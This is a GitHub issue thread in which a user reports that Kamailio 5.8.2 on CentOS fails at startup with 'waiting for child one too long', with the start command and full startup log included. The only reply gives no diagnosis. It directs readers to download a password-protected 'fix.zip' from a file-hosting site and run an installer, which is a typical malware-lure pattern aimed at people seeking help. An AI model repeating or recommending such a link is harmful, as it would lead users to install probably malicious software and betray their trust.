### ISSUE TITLE
Start up failed:  waiting for child one too long

### ISSUE THREAD

**Issue by CzyerChen** [kamailio/kamailio#3960]
### Start up failed with error " waiting for child one too long"

execute start up command, and suddenly failed.

`
 sudo  /usr/local/sbin/kamailio -m 128  -M 8 -E -e -dd -f /usr/local/etc/kamailio/kamailio.cfg
`

#### Reproduction

Maybe the problem of my env.

#### Log Messages

the log:

0(2749) INFO: <core> [core/sctp_core.c:74]: sctp_core_check_support(): SCTP API not enabled - if you want to use it, load sctp module
Listening on
             udp: 192.168.5.167:5061
Aliases:
             udp: 192.168.5.167:5061

 0(2749) INFO: <core> [core/tcp_main.c:5218]: init_tcp(): using epoll_lt as the io watch method (auto detected)
 0(2751) INFO: rr [../outbound/api.h:53]: ob_load_api(): unable to import bind_ob - maybe module is not loaded
 0(2751) INFO: rr [rr_mod.c:185]: mod_init(): outbound module not available
 0(2751) WARNING: db_mysql [km_my_con.c:187]: db_mysql_new_connection(): opt_ssl_ca option not supported by mysql version (value (null)) - ignoring
 0(2751) INFO: auth [auth_mod.c:342]: mod_init(): qop set, but nonce-count (nonce_count) support disabled
 0(2751) WARNING: db_mysql [km_my_con.c:187]: db_mysql_new_connection(): opt_ssl_ca option not supported by mysql version (value (null)) - ignoring
 0(2751) WARNING: tls [tls_mod.c:364]: mod_init(): tls support is disabled (set enable_tls=1 in the config to enable it)
 0(2751) INFO: <core> [main.c:3233]: main(): processes (at least): 24 - shm size: 134217728 - pkg size: 8388608
 0(2751) INFO: <core> [core/udp_server.c:163]: probe_max_receive_buffer(): SO_RCVBUF is initially 16777216 for fd 9
 0(2751) INFO: <core> [core/udp_server.c:233]: probe_max_receive_buffer(): SO_RCVBUF is finally 16777216 on fd 9
 0(2751) INFO: <core> [core/udp_server.c:264]: probe_max_send_buffer(): SO_SNDBUF is initially 16777216 for fd 9
 0(2751) INFO: <core> [core/udp_server.c:334]: probe_max_send_buffer(): SO_SNDBUF is finally 16777216 on fd 9
 1(2754) WARNING: db_mysql [km_my_con.c:187]: db_mysql_new_connection(): opt_ssl_ca option not supported by mysql version (value (null)) - ignoring
 1(2754) NOTICE: ndb_redis [redis_client.c:257]: redisc_init(): Connecting to 10.20.80.33:6380
 0(2751) ERROR: <core> [main.c:1825]: main_loop(): waiting for child one too long - wait time: 1000000
 1(2754) INFO: <core> [main.c:888]: sig_usr(): signal 15 received
 0(2751) INFO: snmpstats [snmpstats.c:399]: mod_destroy(): The SNMPStats module got the kill signal
 0(2751) INFO: snmpstats [snmpstats.c:403]: mod_destroy(): Shutting down the AgentX Sub-Agent!
 0(2751) INFO: <core> [core/sctp_core.c:53]: sctp_core_destroy(): SCTP API not initialized`

what does that mean? ` 0(2751) ERROR: <core> [main.c:1825]: main_loop(): waiting for child one too long - wait time: 1000000`
How can I solve that?

### Additional Information

* **Operating System**: 
`
LSB Version:    :core-4.1-amd64:core-4.1-noarch
Distributor ID: CentOS
Description:    CentOS Linux release 7.9.2009 (Core)
Release:        7.9.2009
Codename:       Core
`

Kamailio-5.8.2

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
